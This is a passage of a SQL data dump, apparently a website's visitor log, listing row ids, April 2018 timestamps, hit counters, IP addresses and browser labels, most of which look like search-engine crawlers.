'141.8.142.74','other'),(230154,1522976730,1,1,0,0,'178.154.171.88','other'),(230155,1522976799,1,1,0,0,'54.165.176.205','other'),(230156,1522976988,1,1,0,0,'54.175.145.65','other'),(230157,1522977164,1,1,0,0,'54.36.148.10','other'),(230158,1522977220,1,1,0,0,'54.36.148.153','other'),(230159,1522977261,1,1,0,0,'54.36.149.48','other'),(230160,1522977422,1,1,0,0,'54.36.149.24','other'),(230161,1522977610,1,1,0,0,'54.36.148.42','other'),(230162,1522977724,1,1,0,0,'54.36.148.28','other'),(230163,1522977815,1,1,0,0,'54.165.176.205','other'),(230164,1522977895,1,1,0,0,'54.175.145.65','other'),(230165,1522978003,1,1,0,0,'216.244.66.237','other'),(230166,1522978180,1,1,0,0,'54.36.149.10','other'),(230167,1522978197,1,0,1,0,'66.249.69.39',''),(230168,1522978236,1,1,0,0,'54.36.148.72','other'),(230169,1522978321,1,1,0,0,'54.36.148.90','other'),(230170,1522978605,1,1,0,0,'54.36.149.55','other'),(230171,1522978660,1,1,0,0,'54.36.148.57','other'),(230172,1522978741,1,1,0,0,'54.165.176.205','other'),(230173,1522978798,1,1,0,0,'54.175.145.65','other'),(230174,1522979049,1,1,0,0,'54.36.148.91','other'),(230175,1522979381,1,1,0,0,'54.36.148.41','other'),(230176,1522979418,1,1,0,0,'54.36.148.234','other'),(230177,1522979676,1,1,0,0,'54.165.176.205','other'),(230178,1522979714,1,1,0,0,'54.175.145.65','other'),(230179,1522979894,1,1,0,0,'54.36.148.80','other'),(230180,1522980099,1,1,0,0,'54.36.148.177','other'),(230181,1522980183,1,1,0,0,'54.36.148.124','other'),(230182,1522980262,1,1,0,0,'54.36.148.59','other'),(230183,1522980438,1,1,0,0,'54.36.149.1','other'),(230184,1522980612,1,1,0,0,'54.165.176.205','other'),(230185,1522980645,1,1,0,0,'54.175.145.65','other'),(230186,1522980675,1,1,0,0,'54.36.148.194','other'),(230188,1522981136,1,1,0,0,'54.36.148.124','other'),(230189,1522981296,1,1,0,0,'54.36.149.79','other'),(230190,1522981322,1,1,0,0,'54.36.149.54','other'),(230191,1522981493,1,1,0,0,'207.46.13.80','other'),(230192,1522981528,1,1,0,0,'54.165.176.205','other'),(230193,1522981554,1,1,0,0,'54.175.145.65','other'),(230194,1522981590,1,1,0,0,'66.249.69.35','chrome'),(230195,1522981837,1,1,0,0,'54.36.148.35','other'),(230196,1522981848,1,1,0,0,'54.36.148.215','other'),(230197,1522981887,1,1,0,0,'54.36.148.69','other'),(230198,1522982112,1,1,0,0,'54.36.148.124','other'),(230199,1522982446,1,1,0,0,'54.165.176.205','other'),(230200,1522982459,1,1,0,0,'54.175.145.65','other'),(230201,1522982573,1,1,0,0,'54.36.148.103','other'),(230202,1522982618,1,1,0,0,'54.36.149.4','other'),(230203,1522982809,1,1,0,0,'54.36.148.94','other'),(230204,1522983133,1,1,0,0,'141.8.142.74','other'),(230205,1522983179,1,1,0,0,'54.36.148.47','other'),(230206,1522983185,1,1,0,0,'54.36.148.193','other'),(230207,1522983280,1,1,0,0,'54.36.148.140','other'),(230208,1522983298,1,0,1,0,'66.249.69.39',''),(230209,1522983363,1,1,0,0,'54.165.176.205','other'),(230210,1522983379,1,1,0,0,'54.175.145.65','other'),(230211,1522983538,1,1,0,0,'54.36.148.174','other'),(230212,1522983603,1,1,0,0,'54.36.148.147','other'),(230213,1522983672,1,1,0,0,'54.36.148.250','other'),(230214,1522983765,1,1,0,0,'54.36.148.119','other'),(230215,1522983825,1,1,0,0,'54.36.148.66','other'),(230216,1522984033,1,1,0,0,'54.36.149.47','other'),(230217,1522984282,1,1,0,0,'54.175.145.65','other'),(230218,1522984331,1,1,0,0,'54.165.176.205','other'),(230219,1522984478,1,1,0,0,'54.36.148.30','other'),(230220,1522984570,1,1,0,0,'54.36.149.53','other'),(230221,1522984626,1,1,0,0,'54.36.148.23','other'),(230222,1522984678,1,1,0,0,'54.36.149.99','other'),(230223,1522984745,1,1,0,0,'8.29.198.27','other'),(230224,1522984774,1,1,0,0,'54.36.149.83','other'),(230225,1522984799,1,1,0,0,'54.36.148.248','other'),(230226,1522984844,1,1,0,0,'207.46.13.80','other'),(230227,1522984865,1,1,0,0,'54.36.149.62','other'),(230228,1522984886,1,1,0,0,'54.36.148.80','other'),(230229,1522984998,1,1,0,0,'54.36.149.88','other'),(230230,1522985196,1,1,0,0,'54.175.145.65','other'),(230231,1522985245,1,1,0,0,'54.165.176.205','other'),(230232,1522985248,1,1,0,0,'54.36.149.36','other'),(230233,1522985582,1,1,0,0,'40.77.167.197','other'),(230234,1522985782,1,1,0,0,'216.244.66.237','other'),(230235,1522985813,1,1,0,0,'54.36.148.60','other'),(230236,1522985879,1,1,0,0,'54.36.148.100','other'),(230237,1522985935,1,1,0,0,'54.36.148.98','other'),(230238,1522986104,1,1,0,0,'54.175.145.65','other'),(230239,1522986172,1,1,0,0,'54.165.176.205','other'),(230240,1522986210,1,1,0,0,'54.36.148.35','other'),(230241,1522986401,1,1,0,0,'54.36.148.164','other'),(230242,1522986474,1,1,0,0,'54.36.148.232','other'),(230243,1522986802,2,1,1,0,'66.249.69.35',''),(230244,1522987005,1,1,0,0,'54.175.145.65','other'),(230245,1522987131,1,1,0,0,'54.165.176.205','other'),(230246,1522987456,1,1,0,0,'87.250.224.46','other'),(230247,1522987537,1,1,0,0,'178.154.171.88','other'),(230248,1522987617,1,1,0,0,'54.36.149.44','other'),(230249,1522987686,1,1,0,0,'54.36.149.81','other'),(230250,1522988023,1,1,0,0,'54.36.148.57','other'),(230251,1522988090,1,1,0,0,'54.165.176.205','other'),(230252,1522988105,1,1,0,0,'54.175.145.65','other'),(230254,1522988258,1,1,0,0,'54.36.148.221','other'),(230255,1522988585,1,1,0,0,'54.36.148.121','other'),(230256,1522988624,1,1,0,0,'54.36.148.85','other'),(230257,1522988877,2,2,0,0,'141.8.142.74','other'),(230258,1522988931,2,2,0,0,'54.36.148.216','other'),(230259,1522988942,2,2,0,0,'216.244.66.237','other'),(230260,1522989006,1,1,0,0,'54.175.145.65','other'),(230261,1522989032,1,1,0,0,'54.165.176.205','other'),(230262,1522989250,1,1,0,0,'54.36.149.93','other'),(230263,1522989409,1,1,0,0,'54.36.149.10','other'),(230264,1522989416,1,1,0,0,'54.36.149.81','other'),(230265,1522989921,1,1,0,0,'54.175.145.65','other'),(230266,1522990066,1,1,0,0,'54.165.176.205','other'),(230267,1522990098,1,1,0,0,'54.36.148.171','other'),(230268,1522990190,1,1,0,0,'213.180.203.7','other'),(230269,1522990444,1,1,0,0,'91.196.177.46','chrome'),(230270,1522990473,1,1,0,0,'54.36.148.206','other'),(230271,1522990506,1,1,0,0,'54.36.148.141','other'),(230272,1522990846,1,1,0,0,'54.175.145.65','other'),(230273,1522990967,1,1,0,0,'54.165.176.205','other'),(230274,1522991059,1,1,0,0,'54.36.148.142','other'),(230275,1522991102,1,1,0,0,'54.36.148.62','other'),(230276,1522991109,1,1,0,0,'54.36.149.83','other'),(230277,1522991245,1,1,0,0,'66.249.69.89','chrome'),(230278,1522991279,1,1,0,0,'54.36.148.132','other'),(230279,1522991310,1,1,0,0,'54.36.148.28','other'),(230280,1522991446,1,1,0,0,'141.8.142.74','other'),(230281,1522991598,1,1,0,0,'54.36.149.31','other'),(230282,1522991675,1,1,0,0,'178.154.171.88','other'),(230283,1522991774,1,1,0,0,'54.175.145.65','other'),(230284,1522991788,1,1,0,0,'54.36.148.166','other'),(230285,1522991920,1,1,0,0,'54.165.176.205','other'),(230286,1522991991,1,1,0,0,'54.36.149.89','other'),(230287,1522992007,1,1,0,0,'216.244.66.237','other'),(230288,1522992662,1,1,0,0,'54.36.148.129','other'),(230289,1522992702,1,1,0,0,'54.175.145.65','other'),(230290,1522992867,1,1,0,0,'54.165.176.205','other'),(230291,1522992956,1,1,0,0,'54.36.148.212','other'),(230292,1522993027,2,2,0,0,'91.196.178.83','chrome'),(230293,1522993042,1,1,0,0,'54.36.149.2','other'),(230294,1522993118,1,1,0,0,'54.36.149.21','other'),(230295,1522993160,1,1,0,0,'54.36.148.220','other'),(230296,1522993203,1,1,0,0,'46.201.59.215','chrome'),(230297,1522993381,1,1,0,0,'54.36.149.8','other'),(230298,1522993458,1,1,0,0,'54.36.148.133','other'),(230299,1522993468,1,1,0,0,'54.36.148.109','other'),(230300,1522993497,1,1,0,0,'91.192.133.225','chrome'),(230301,1522993608,1,1,0,0,'54.175.145.65','other'),(230302,1522993805,1,1,0,0,'54.165.176.205','other'),(230303,1522994058,1,1,0,0,'54.36.148.104','other'),(230304,1522994261,1,1,0,0,'54.36.148.35','other'),(230305,1522994291,1,1,0,0,'91.196.179.138','chrome'),(230306,1522994523,1,1,0,0,'54.175.145.65','other'),(230307,1522994526,3,3,0,0,'91.196.178.83','chrome'),(230308,1522994574,1,1,0,0,'178.154.171.88','other'),(230309,1522994592,1,1,0,0,'54.36.149.16','other'),(230310,1522994934,1,1,0,0,'54.36.148.73','other'),(230311,1522994937,1,1,0,0,'54.165.176.205','other'),(230312,1522995322,1,1,0,0,'91.196.177.46','chrome'),(230313,1522995424,1,1,0,0,'54.175.145.65','other'),(230314,1522995483,1,1,0,0,'54.36.148.182','other'),(230315,1522995600,1,1,0,0,'8.29.198.26','other'),(230316,1522995641,1,0,1,0,'66.249.69.41',''),(230317,1522995720,1,1,0,0,'54.36.148.100','other'),(230318,1522995796,1,1,0,0,'91.196.178.92','firefox'),(230319,1522995861,1,1,0,0,'54.165.176.205','other'),(230320,1522996028,1,1,0,0,'54.36.149.58','other'),(230321,1522996051,1,1,0,0,'54.36.148.102','other'),(230322,1522996176,1,1,0,0,'91.196.178.83','chrome'),(230323,1522996329,1,1,0,0,'54.175.145.65','other'),(230324,1522996593,1,1,0,0,'141.8.142.74','other'),(230325,1522996777,1,1,0,0,'54.165.176.205','other'),(230326,1522996805,1,1,0,0,'216.244.66.237','other'),(230327,1522996981,1,1,0,0,'54.36.149.92','other'),(230328,1522997257,1,1,0,0,'54.175.145.65','other'),(230329,1522997346,1,1,0,0,'54.36.149.12','other'),(230330,1522997458,1,1,0,0,'54.36.148.129','other'),(230331,1522997581,1,1,0,0,'54.36.148.243','other'),(230332,1522997666,1,1,0,0,'54.36.148.127','other'),(230333,1522997694,1,1,0,0,'54.36.148.114','other'),(230334,1522997723,1,1,0,0,'54.165.176.205','other'),(230335,1522997758,1,1,0,0,'54.36.148.242','other'),(230336,1522998098,1,1,0,0,'54.36.148.81','other'),(230337,1522998179,1,1,0,0,'54.175.145.65','other'),(230338,1522998209,1,1,0,0,'54.36.149.66','other'),(230339,1522998367,1,1,0,0,'92.112.125.243','chrome'),(230340,1522998424,2,2,0,0,'91.196.178.83','chrome'),(230341,1522998647,2,2,0,0,'54.165.176.205','other'),(230342,1522999059,2,2,0,0,'130.180.218.166','chrome'),(230343,1522999088,1,1,0,0,'54.175.145.65','other'),(230344,1522999116,1,1,0,0,'54.36.148.147','other'),(230345,1522999205,1,1,0,0,'54.36.149.102','other'),(230346,1522999317,1,1,0,0,'54.36.149.13','other'),(230347,1522999319,1,1,0,0,'54.36.148.246','other'),(230348,1522999357,1,1,0,0,'54.36.148.75','other'),(230349,1522999591,1,1,0,0,'54.36.149.24','other'),(230350,1522999775,3,3,0,0,'91.196.178.83','chrome'),(230351,1522999789,1,1,0,0,'54.165.176.205','other'),(230352,1522999797,1,1,0,0,'54.36.148.153','other'),(230353,1522999861,1,1,0,0,'54.36.148.208','other'),(230354,1522999954,1,1,0,0,'54.36.148.131','other'),(230355,1522999977,1,1,0,0,'54.36.149.76','other'),(230356,1523000003,1,1,0,0,'54.175.145.65','other'),(230357,1523000091,1,1,0,0,'54.36.148.161','other'),(230358,1523000198,1,1,0,0,'54.36.148.162','other'),(230359,1523000277,1,1,0,0,'54.36.149.59','other'),(230360,1523000461,1,1,0,0,'54.36.148.11','other'),(230361,1523000595,1,1,0,0,'91.124.219.142','chrome'),(230362,1523000716,1,1,0,0,'54.165.176.205','other'),(230363,1523000807,1,1,0,0,'46.211.5.243','other'),(230364,1523000918,1,1,0,0,'54.175.145.65','other'),(230365,1523000994,1,1,0,0,'141.8.142.74','other'),(230366,1523001336,1,1,0,0,'54.36.149.30','other'),(230367,1523001605,1,1,0,0,'54.36.148.72','other'),(230368,1523001614,1,1,0,0,'54.36.149.44','other'),(230369,1523001632,1,0,1,0,'66.249.69.35',''),(230370,1523001656,1,1,0,0,'54.165.176.205','other'),(230371,1523001837,1,1,0,0,'54.175.145.65','other'),(230372,1523001975,1,1,0,0,'54.36.148.210','other'),(230373,1523002021,1,1,0,0,'54.36.148.239','other'),(230374,1523002172,1,1,0,0,'54.36.148.221','other'),(230375,1523002202,1,1,0,0,'54.36.148.133','other'),(230376,1523002381,1,1,0,0,'54.36.148.119','other'),(230377,1523002493,1,1,0,0,'54.36.149.54','other'),(230378,1523002568,1,1,0,0,'54.165.176.205','other'),(230379,1523002733,1,1,0,0,'54.36.148.206','other'),(230380,1523002758,1,1,0,0,'54.175.145.65','other'),(230381,1523002803,1,1,0,0,'54.36.148.120','other'),(230382,1523002879,1,1,0,0,'54.36.149.83','other'),(230383,1523002990,2,2,0,0,'91.196.178.83','chrome'),(230384,1523003120,1,1,0,0,'54.36.149.69','other'),(230385,1523003186,1,1,0,0,'54.36.148.251','other'),(230386,1523003478,1,1,0,0,'54.36.148.166','other'),(230387,1523003486,1,1,0,0,'54.165.176.205','other'),(230388,1523003542,1,0,1,0,'66.249.69.41',''),(230389,1523003602,1,1,0,0,'54.36.149.35','other'),(230390,1523003635,1,0,1,0,'66.249.69.35',''),(230391,1523003689,1,1,0,0,'54.175.145.65','other'),(230392,1523003738,1,0,1,0,'66.249.69.39',''),(230393,1523003754,1,1,0,0,'54.36.148.233','other'),(230394,1523003865,1,1,0,0,'54.36.148.48','other'),(230395,1523004081,2,2,0,0,'141.8.142.74','other'),(230396,1523004098,1,1,0,0,'54.36.148.236','other'),(230397,1523004354,1,1,0,0,'54.36.148.209','other'),(230398,1523004379,1,1,0,0,'54.36.149.87','other'),(230399,1523004644,1,1,0,0,'54.165.176.205','other'),(230400,1523004662,1,1,0,0,'54.175.145.65','other'),(230401,1523005084,1,1,0,0,'54.36.148.99','other'),(230402,1523005184,1,1,0,0,'141.8.142.74','other'),(230403,1523005358,1,1,0,0,'54.36.148.102','other'),(230404,1523005446,1,0,1,0,'66.249.69.41',''),(230405,1523005481,1,1,0,0,'54.36.148.122','other'),(230406,1523005517,1,1,0,0,'128.199.42.73','chrome'),(230407,1523005565,1,1,0,0,'54.175.145.65','other'),(230408,1523005594,1,1,0,0,'54.165.176.205','other'),(230409,1523006059,1,1,0,0,'54.36.148.231','other'),(230410,1523006099,3,3,0,0,'91.196.178.169','chrome'),(230411,1523006339,2,2,0,0,'130.180.219.198','chrome'),(230412,1523006342,1,1,0,0,'54.36.149.34','other'),(230413,1523006464,1,1,0,0,'8.29.198.26','other'),(230414,1523006489,1,1,0,0,'54.175.145.65','other'),(230415,1523006526,1,1,0,0,'128.199.42.73','chrome'),(230416,1523006564,1,0,1,0,'66.249.69.93',''),(230417,1523006575,1,1,0,0,'91.196.177.46','chrome'),(230418,1523006629,1,1,0,0,'54.36.148.223','other'),(230419,1523006655,1,1,0,0,'54.165.176.205','other'),(230420,1523006932,1,1,0,0,'92.112.125.243','chrome'),(230421,1523006935,1,1,0,0,'157.55.39.131','other'),(230422,1523007016,1,1,0,0,'54.36.148.215','other'),(230423,1523007287,1,1,0,0,'54.36.149.49','other'),(230424,1523007313,1,1,0,0,'54.36.149.101','other'),(230425,1523007391,1,1,0,0,'54.175.145.65','other'),(230426,1523007396,2,2,0,0,'134.249.146.125','chrome'),(230427,1523007439,1,1,0,0,'54.36.148.142','other'),(230428,1523007441,1,1,0,0,'54.36.148.22','other'),(230429,1523007591,1,1,0,0,'54.165.176.205','other'),(230430,1523007859,1,1,0,0,'54.36.148.99','other'),(230431,1523008264,1,1,0,0,'54.36.148.30','other'),(230432,1523008293,1,1,0,0,'54.175.145.65','other'),(230433,1523008313,1,1,0,0,'54.36.148.79','other'),(230434,1523008521,1,1,0,0,'54.36.148.199','other'),(230435,1523008526,1,1,0,0,'54.165.176.205','other'),(230436,1523008648,1,1,0,0,'54.36.148.60','other'),(230437,1523008863,3,0,3,0,'66.249.69.39',''),(230438,1523008976,1,1,0,0,'35.226.23.240','other'),(230439,1523009116,1,1,0,0,'54.36.148.151','other'),(230440,1523009207,1,1,0,0,'54.175.145.65','other'),(230441,1523009393,1,1,0,0,'94.45.52.102','chrome'),(230442,1523009444,1,1,0,0,'54.165.176.205','other'),(230443,1523009483,1,1,0,0,'178.154.171.4','other'),(230444,1523009486,1,1,0,0,'54.36.148.253','other'),(230445,1523009618,1,1,0,0,'54.36.148.181','other'),(230446,1523009694,1,1,0,0,'54.36.148.150','other'),(230447,1523009699,1,1,0,0,'54.36.149.6','other'),(230448,1523010093,2,2,0,0,'141.8.142.74','other'),(230449,1523010153,1,1,0,0,'54.36.148.149','other'),(230450,1523010226,1,1,0,0,'178.154.171.88','other'),(230451,1523010249,1,1,0,0,'54.36.149.40','other'),(230452,1523010301,1,1,0,0,'54.36.148.164','other'),(230453,1523010394,1,1,0,0,'54.165.176.205','other'),(230454,1523011046,1,1,0,0,'54.36.148.77','other'),(230455,1523011317,1,0,1,0,'66.249.69.41',''),(230456,1523011339,1,1,0,0,'54.165.176.205','other'),(230457,1523011387,1,1,0,0,'54.36.148.219','other'),(230458,1523011536,1,1,0,0,'54.36.148.22','other'),(230459,1523011678,1,1,0,0,'95.135.148.216','chrome'),(230460,1523011680,1,1,0,0,'54.36.148.112','other'),(230461,1523012077,1,1,0,0,'180.76.15.21','other'),(230462,1523012265,1,1,0,0,'54.165.176.205','other'),(230463,1523012294,2,2,0,0,'141.8.142.74','other'),(230464,1523012299,1,1,0,0,'54.36.148.231','other'),(230465,1523012497,1,1,0,0,'54.36.148.221','other'),(230466,1523012875,1,1,0,0,'207.46.13.58','other'),(230467,1523012898,1,1,0,0,'91.196.178.86','firefox'),(230468,1523012901,1,1,0,0,'54.36.148.74','other'),(230469,1523013029,1,1,0,0,'91.196.178.171','chrome'),(230470,1523013039,1,1,0,0,'54.36.148.142','other'),(230471,1523013045,1,1,0,0,'35.226.23.240','other'),(230472,1523013168,1,1,0,0,'54.165.176.205','other'),(230473,1523013185,1,1,0,0,'54.36.148.85','other'),(230474,1523013207,2,2,0,0,'216.244.66.237','other'),(230475,1523013296,1,1,0,0,'91.196.178.164','other'),(230476,1523013698,1,1,0,0,'54.36.148.245','other'),(230477,1523013726,1,1,0,0,'91.196.178.86','chrome'),(230478,1523013977,1,1,0,0,'54.36.148.106','other'),(230479,1523014085,2,2,0,0,'91.196.178.169','chrome'),(230480,1523014089,1,1,0,0,'54.165.176.205','other'),(230481,1523014455,1,1,0,0,'54.36.149.66','other'),(230482,1523014543,1,1,0,0,'54.36.149.98','other'),(230483,1523014551,1,1,0,0,'54.36.149.73','other'),(230484,1523014912,1,1,0,0,'216.244.66.237','other'),(230485,1523014987,1,1,0,0,'54.36.148.226','other'),(230486,1523015023,1,1,0,0,'54.165.176.205','other'),(230487,1523015233,1,1,0,0,'54.36.148.236','other'),(230488,1523015259,1,1,0,0,'54.36.148.251','other'),(230489,1523015289,1,1,0,0,'180.76.15.149','other'),(230490,1523015481,1,1,0,0,'54.36.148.156','other'),(230491,1523015962,1,1,0,0,'54.165.176.205','other'),(230492,1523016054,1,1,0,0,'54.36.148.18','other'),(230493,1523016057,1,1,0,0,'54.36.148.198','other'),(230494,1523016108,1,1,0,0,'178.154.171.88','other'),(230495,1523016111,1,1,0,0,'54.36.148.197','other'),(230496,1523016530,1,1,0,0,'54.36.148.173','other'),(230497,1523016553,1,1,0,0,'54.36.148.141','other'),(230498,1523016636,1,1,0,0,'54.36.148.75','other'),(230499,1523016668,1,1,0,0,'54.36.148.255','other'),(230500,1523016931,1,1,0,0,'54.36.148.80','other'),(230501,1523016946,1,1,0,0,'54.165.176.205','other'),(230502,1523017176,1,1,0,0,'54.36.149.51','other'),(230503,1523017345,1,1,0,0,'8.29.198.27','other'),(230504,1523017640,1,1,0,0,'54.36.148.81','other'),(230505,1523017683,1,1,0,0,'54.36.149.15','other'),(230506,1523017739,1,1,0,0,'54.36.149.81','other'),(230507,1523017790,1,1,0,0,'54.36.148.147','other'),(230508,1523017860,1,1,0,0,'54.36.148.58','other'),(230509,1523017863,1,1,0,0,'54.165.176.205','other'),(230510,1523018109,2,2,0,0,'141.8.142.74','other'),(230511,1523018187,1,1,0,0,'54.36.148.145','other'),(230512,1523018452,1,1,0,0,'54.36.148.143','other'),(230513,1523018619,1,1,0,0,'54.36.149.82','other'),(230514,1523018774,1,1,0,0,'54.165.176.205','other'),(230515,1523018797,1,1,0,0,'54.36.148.147','other'),(230516,1523018827,1,1,0,0,'54.36.148.30','other'),(230517,1523018978,1,1,0,0,'54.36.148.23','other'),(230518,1523019055,3,3,0,0,'80.254.155.43','chrome'),(230519,1523019351,1,1,0,0,'54.36.148.84','other'),(230520,1523019705,1,1,0,0,'54.165.176.205','other'),(230521,1523020005,1,1,0,0,'54.36.148.121','other'),(230522,1523020079,1,1,0,0,'54.36.149.39','other'),(230523,1523020506,1,1,0,0,'107.167.108.89','other'),(230524,1523020582,1,1,0,0,'54.36.148.20','other'),(230525,1523020628,1,1,0,0,'54.165.176.205','other'),(230526,1523020763,1,1,0,0,'54.36.148.101','other'),(230527,1523020875,1,1,0,0,'54.36.148.107','other'),(230528,1523021079,1,1,0,0,'54.36.148.62','other'),(230529,1523021080,1,1,0,0,'141.8.132.19','other'),(230530,1523021445,1,1,0,0,'54.36.149.39','other'),(230531,1523021531,1,1,0,0,'54.165.176.205','other'),(230532,1523021915,1,1,0,0,'37.9.113.157','other'),(230533,1523021916,1,0,1,0,'66.249.69.39',''),(230534,1523021965,1,1,0,0,'54.36.148.221','other'),(230535,1523022078,1,1,0,0,'54.36.148.73','other'),(230536,1523022121,1,1,0,0,'213.180.203.40','other'),(230537,1523022163,1,1,0,0,'54.36.148.116','other'),(230538,1523022466,1,1,0,0,'54.165.176.205','other'),(230539,1523022583,1,1,0,0,'54.36.149.49','other'),(230540,1523023134,1,1,0,0,'54.36.148.159','other'),(230541,1523023164,1,0,1,0,'66.249.69.35',''),(230542,1523023216,1,1,0,0,'54.36.148.186','other'),(230543,1523023283,1,1,0,0,'54.36.148.205','other'),(230544,1523023303,1,1,0,0,'54.36.148.210','other'),(230545,1523023388,1,1,0,0,'54.36.149.79','other'),(230546,1523023400,1,1,0,0,'54.165.176.205','other'),(230547,1523023408,1,1,0,0,'188.32.6.27','msie'),(230548,1523024316,1,1,0,0,'54.165.176.205','other'),(230549,1523024346,1,1,0,0,'54.36.148.64','other'),(230550,1523024354,1,1,0,0,'54.36.149.93','other'),(230551,1523024476,1,1,0,0,'54.36.149.89','other'),(230552,1523024699,1,1,0,0,'54.36.148.181','other'),(230553,1523024718,1,1,0,0,'54.36.149.36','other'),(230554,1523024786,1,1,0,0,'54.36.148.154','other'),(230555,1523024914,1,1,0,0,'54.36.149.24','other'),(230556,1523024994,1,1,0,0,'54.36.149.58','other'),(230557,1523025057,1,1,0,0,'54.36.148.250','other'),(230558,1523025163,1,1,0,0,'54.36.148.163','other'),(230559,1523025223,1,1,0,0,'54.165.176.205','other'),(230560,1523025310,1,1,0,0,'54.36.149.68','other'),(230561,1523025321,1,0,1,0,'66.249.69.35',''),(230562,1523025638,1,1,0,0,'54.36.149.88','other'),(230563,1523026159,1,1,0,0,'54.165.176.205','other'),(230564,1523026194,1,1,0,0,'54.36.148.215','other'),(230565,1523026282,1,1,0,0,'157.55.39.87','other'),(230566,1523026623,1,1,0,0,'54.36.148.178','other'),(230567,1523026807,1,1,0,0,'95.135.222.237','other'),(230568,1523026861,1,1,0,0,'54.36.148.153','other'),(230569,1523027060,1,0,1,0,'66.249.69.35',''),(230570,1523027094,1,1,0,0,'54.165.176.205','other'),(230571,1523027295,1,1,0,0,'54.36.148.165','other'),(230572,1523027503,1,1,0,0,'54.36.148.69','other'),(230573,1523027889,1,1,0,0,'188.230.43.254','other'),(230574,1523027949,1,1,0,0,'157.55.39.131','other'),(230575,1523028007,1,1,0,0,'54.165.176.205','other'),(230576,1523028073,1,1,0,0,'54.36.148.98','other'),(230577,1523028170,1,1,0,0,'54.36.149.4','other'),(230578,1523028215,1,1,0,0,'8.29.198.25','other'),(230579,1523028216,1,1,0,0,'54.36.149.102','other'),(230580,1523028231,1,1,0,0,'54.36.148.152','other'),(230581,1523028278,1,1,0,0,'54.36.148.150','other'),(230582,1523028626,1,1,0,0,'54.36.149.38','other'),(230583,1523028635,1,1,0,0,'216.244.66.237','other'),(230584,1523028712,1,1,0,0,'54.36.148.29','other'),(230585,1523028838,1,0,1,0,'66.249.69.39',''),(230586,1523028920,1,1,0,0,'54.165.176.205','other'),(230587,1523029016,1,1,0,0,'54.36.148.10','other'),(230588,1523029105,1,1,0,0,'54.36.148.93','other'),(230589,1523029182,1,1,0,0,'54.36.149.47','other'),(230590,1523029237,1,1,0,0,'54.36.148.72','other'),(230591,1523029331,1,1,0,0,'54.36.148.69','other'),(230592,1523029531,1,1,0,0,'54.36.149.19','other'),(230593,1523029541,1,1,0,0,'54.36.149.38','other'),(230594,1523029851,1,1,0,0,'54.165.176.205','other'),(230595,1523029852,1,0,1,0,'66.249.69.39',''),(230596,1523030174,1,1,0,0,'54.36.148.42','other'),(230597,1523030284,1,1,0,0,'188.230.43.254','other'),(230598,1523030697,1,1,0,0,'46.211.105.44','other'),(230599,1523030795,1,1,0,0,'54.165.176.205','other'),(230600,1523031264,1,1,0,0,'54.36.148.75','other'),(230601,1523031313,1,1,0,0,'54.36.148.205','other'),(230602,1523031341,1,0,1,0,'66.249.69.39',''),(230603,1523031655,1,1,0,0,'54.36.148.41','other'),(230604,1523031697,1,1,0,0,'54.165.176.205','other'),(230605,1523031715,1,1,0,0,'54.36.148.23','other'),(230606,1523031786,1,1,0,0,'54.36.149.16','other'),(230607,1523031843,1,1,0,0,'54.36.148.17','other'),(230608,1523031995,1,1,0,0,'54.36.148.133','other'),(230609,1523032173,1,1,0,0,'54.36.148.10','other'),(230610,1523032215,1,1,0,0,'54.36.148.36','other'),(230611,1523032276,1,0,1,0,'66.249.66.156',''),(230612,1523032292,1,1,0,0,'193.194.127.222','firefox'),(230613,1523032310,1,1,0,0,'54.36.148.150','other'),(230614,1523032311,1,1,0,0,'54.36.149.83','other'),(230615,1523032496,1,1,0,0,'54.36.148.146','other'),(230616,1523032532,1,1,0,0,'54.36.148.111','other'),(230617,1523032546,1,1,0,0,'54.36.148.83','other'),(230618,1523032599,1,1,0,0,'54.165.176.205','other'),(230619,1523032830,1,1,0,0,'35.226.23.240','other'),(230620,1523032953,1,1,0,0,'54.36.149.94','other'),(230621,1523033141,1,1,0,0,'54.36.148.162','other'),(230622,1523033214,1,1,0,0,'54.36.148.114','other'),(230623,1523033492,1,1,0,0,'91.209.11.236','other'),(230624,1523033494,1,1,0,0,'54.36.148.195','other'),(230625,1523033513,1,1,0,0,'54.165.176.205','other'),(230626,1523033610,1,1,0,0,'54.36.148.166','other'),(230627,1523033753,1,1,0,0,'37.9.113.114','other'),(230628,1523033782,1,1,0,0,'54.36.148.244','other'),(230629,1523033793,1,0,1,0,'66.249.66.201',''),(230630,1523033809,1,1,0,0,'54.36.148.54','other'),(230631,1523034047,1,1,0,0,'54.36.148.56','other'),(230632,1523034425,1,1,0,0,'54.165.176.205','other'),(230633,1523034431,1,1,0,0,'54.36.149.97','other'),(230634,1523034435,1,1,0,0,'141.8.142.74','other'),(230635,1523034438,1,1,0,0,'37.9.113.115','other'),(230636,1523034602,1,1,0,0,'54.36.148.198','other'),(230637,1523034909,1,1,0,0,'141.8.142.152','other'),(230638,1523034930,1,1,0,0,'54.36.148.88','other'),(230639,1523034941,1,1,0,0,'54.36.149.43','other'),(230640,1523035368,1,1,0,0,'54.165.176.205','other'),(230641,1523035402,1,1,0,0,'54.36.148.50','other'),(230642,1523035445,1,1,0,0,'54.36.149.69','other'),(230643,1523035630,1,1,0,0,'54.36.148.247','other'),(230644,1523035683,1,1,0,0,'87.236.195.22','firefox'),(230645,1523035865,1,0,1,0,'66.249.66.201',''),(230646,1523035872,1,1,0,0,'54.36.149.35','other'),(230647,1523036180,1,1,0,0,'178.154.200.73','other'),(230648,1523036326,1,1,0,0,'54.165.176.205','other'),(230649,1523036387,1,1,0,0,'54.36.148.162','other'),(230650,1523036566,1,1,0,0,'54.36.148.167','other'),(230651,1523036731,1,1,0,0,'54.67.59.131','chrome'),(230652,1523036755,1,1,0,0,'87.250.224.46','other'),(230653,1523036875,1,1,0,0,'54.36.148.212','other'),(230654,1523037281,1,1,0,0,'54.165.176.205','other'),(230655,1523037349,1,1,0,0,'216.244.66.237','other'),(230656,1523037350,1,1,0,0,'54.36.149.55','other'),(230657,1523037369,1,1,0,0,'54.36.149.48','other'),(230658,1523037863,1,1,0,0,'54.165.59.7','other'),(230659,1523038182,1,1,0,0,'54.165.176.205','other'),(230660,1523038212,1,1,0,0,'54.36.148.132','other'),(230661,1523038252,1,0,1,0,'66.249.66.199',''),(230662,1523038349,1,1,0,0,'54.36.149.69','other'),(230663,1523038374,1,1,0,0,'54.36.149.51','other'),(230664,1523038656,1,0,1,0,'66.249.66.201',''),(230665,1523038974,1,1,0,0,'37.73.198.102','chrome'),(230666,1523039084,1,1,0,0,'54.165.176.205','other'),(230667,1523039105,1,1,0,0,'8.29.198.27','other'),(230668,1523039226,1,1,0,0,'157.55.39.132','other'),(230669,1523039345,1,1,0,0,'54.36.148.10','other'),(230670,1523039578,2,0,2,0,'66.249.66.195',''),(230671,15230396